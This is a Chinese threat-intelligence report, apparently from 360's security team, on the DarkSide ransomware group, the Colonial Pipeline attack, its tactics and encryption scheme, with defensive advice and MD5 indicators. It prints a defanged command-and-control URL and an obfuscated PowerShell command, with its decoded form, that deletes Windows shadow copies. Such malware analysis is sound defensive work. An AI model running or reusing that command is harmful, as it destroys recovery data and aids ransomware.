DarkSide是一支新兴的RaaS(勒索即服务)犯罪团伙,该团伙有可能是由其他勒索软件活动的前分支机构所组织发起的,依据该团伙之前公布的攻击规则声明,该团伙只会针对除医疗、政府、教育、非盈利组织和殡葬行业外的组织机构发起勒索攻击。根据360官网发布的《2021年1月勒索病毒流行态势分析》介绍,该勒索病毒家族最早出现于2020年8月,截至目前为止被公开的有81个企业遭遇该勒索病毒家族的攻击。
相关受害企业信息
2021年4月20日,DarkSide团伙在其暗网网站发布公告,称其入侵了许多纳斯达克和其他证券交易所上市公司,并加密了相关公司的核心数据,如果相关公司拒绝支付赎金,该团伙准备公布窃取的数据信息,在相关公司的股票卖空期权中获利。
DarkSide勒索通知
2021年5月7日,美国最大燃油管道商Colonial Pipeline遭遇DarkSide团伙的定向攻击,迫使其关闭了向人口稠密的美国东部各州供油的关键燃油网络。
Colonial Pipeline公司紧急通告
根据DarkSide团伙的历史攻击数据分析,该团伙的攻击特点有别于其他勒索团伙,在针对相关组织机构释放安装勒索病毒攻击前会先窃取大量的数据,其在伊朗还创建了一个分布式存储系统用于存储受害者数据。
DarkSide团伙关于存储系统的公告
-
勒索病毒主要针对Windows系统,但是也存在针对Linux系统的变种
-
使用大量渗透测试工具针对相关组织机构的外部网络系统实施漏洞扫描和入侵渗透
-
进入相关组织机构的内网后会定向攻击Windows域控制器,企图控制整个企业内网
-
窃取组织机构的核心数据会上传至私有的云分布式存储系统
-
控制组织机构的核心资产后,最终实施安装勒索病毒攻击
Darkside的勒索通知专门针对企业定制,会专门针对企业的会计数据、执行数据、销售数据、客户支持数据、营销数据等核心价值数据进行窃取和勒索攻击、
DarkSide勒索病毒在初启动时会检查检查当前用户是否为管理员:
病毒会将注入当前用户名、计算机名等信息加密后发送至C2务器。测试时URL为:
hxxp://securebestapp20.com/mhzPjMHjEl
调用系统powershell执行命令:
powershell -ep bypass -c ""(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s""
解开字符串后实际命令为删除Windows系统卷影的操作:
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
在准备工作完成后,病毒启动两个线程循环加密文件。
勒索病毒采用Salsa20算法加密受害人数据,再使用RSA-1024算法对Salsa20的密钥进行加密并放于文件末尾。
最终,病毒会修改修改用户桌面背景,并留下勒索信息要求受害人主动联系自己交付赎金。
DarkSide团伙成员曾在知名俄语系论坛发布DarkSide相关勒索软件信息。
综合技术特征和历史活动判断,该团伙是一支典型的RaaS(勒索即服务)犯罪团伙, 疑似存在大量俄语系人员。
《2020年全球高级持续性威胁(APT)研究报告》中对2021年攻击趋势预测中,我们认为意图为破坏、窃密的针对性勒索攻击将不断出现。去年针对性定向勒索攻击大幅上升,针对英特尔、富士康、巴西航空工业公司、日本汽车制造商本田等大型企业的勒索攻击就有二十多起。这些被勒索的企业都造成了不同程度的机密数据泄露、业务中断等重大影响。针对这些攻击我们很难确定攻击者实际目的,但确定的是攻击给用户造成了严重的影响。勒索攻击和APT攻击之间的交集逐渐增多,勒索攻击更像是一场精心策划的APT攻击中的烟雾弹,将其真实攻击意图掩盖。
-
发现中毒机器应立即关闭其网络和该计算机。关闭网络能阻止勒索病毒在内网横向传播,关闭计算机能及时阻止勒索病毒继续加密文件;
-
联系安全厂商,对内部网络进行排查处理;
-
公司内部所有机器口令均应更换,你无法确定黑客掌握了内部多少机器的口令。
-
联系安全厂商,对内部网络进行排查处理;
-
登录口令要有足够的长度和复杂性,并定期更换登录口令;
-
重要资料的共享文件夹应设置访问权限控制,并进行定期备份;
-
定期检测系统和软件中的安全漏洞,及时打上补丁;
-
登录口令要有足够的长度和复杂性,并定期更换登录口令;
-
重要资料的共享文件夹应设置访问权限控制,并进行定期备份;
-
定期检测系统和软件中的安全漏洞,及时打上补丁。
MD5:
01cef4d4f9306177d42f221854ee552b
0e178c4808213ce50c2540468ce409d3
0ed51a595631e9b4d60896ab5573332f
3fd9b0117a0e79191859630148dcdc6d
47a4420ad26f60bb6bba5645326fa963
4d419dc50e3e4824c096f298e0fa885a
5ff75d33080bb97a8e6b54875c221777
66ddb290df3d510a6001365c3a694de2
6a7fdab1c7f6c5a5482749be5c4bf1a4
885fc8fb590b899c1db7b42fe83dddc3
91e2807955c5004f13006ff795cb803c
9d418ecc0f3bf45029263b0944236884
9e779da82d86bcd4cc43ab29f929f73f
c2764be55336f83a59aa0f63a0b36732
c363e327287081251b820276cd9ce1f8
d6634959e4f9b42dfc02b270324fa6d9
e44450150e8683a0addd5c686cd4d202
f75ba194742c978239da2892061ba1b4
f9fc1a1a95d5723c140c2a8effc93722
04fde4340cc79cd9e61340d4c1e8ddfb
68ada5f6aa8e3c3969061e905ceb204c
69ec3d1368adbe75f3766fc88bc64afc
c830512579b0e08f40bc1791fc10c582
c4f1a1b73e4af0fbb63af8ee89a5a7fe
29bcd459f5ddeeefad26fc098304e786
f87a2e1c3d148a67eaeb696b1ab69133
360高级威胁研究院
360高级威胁研究院是360政企安全集团的核心能力支持部门,由360资深安全专家组成,专注于高级威胁的发现、防御、处置和研究,曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击,独家披露多个国家级APT组织的高级行动,赢得业内外的广泛认可,为360保障国家网络安全提供有力支撑。
本文始发于微信公众号(360威胁情报中心):DarkSide针对美国关键基础设施的定向勒索分析研判报告
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论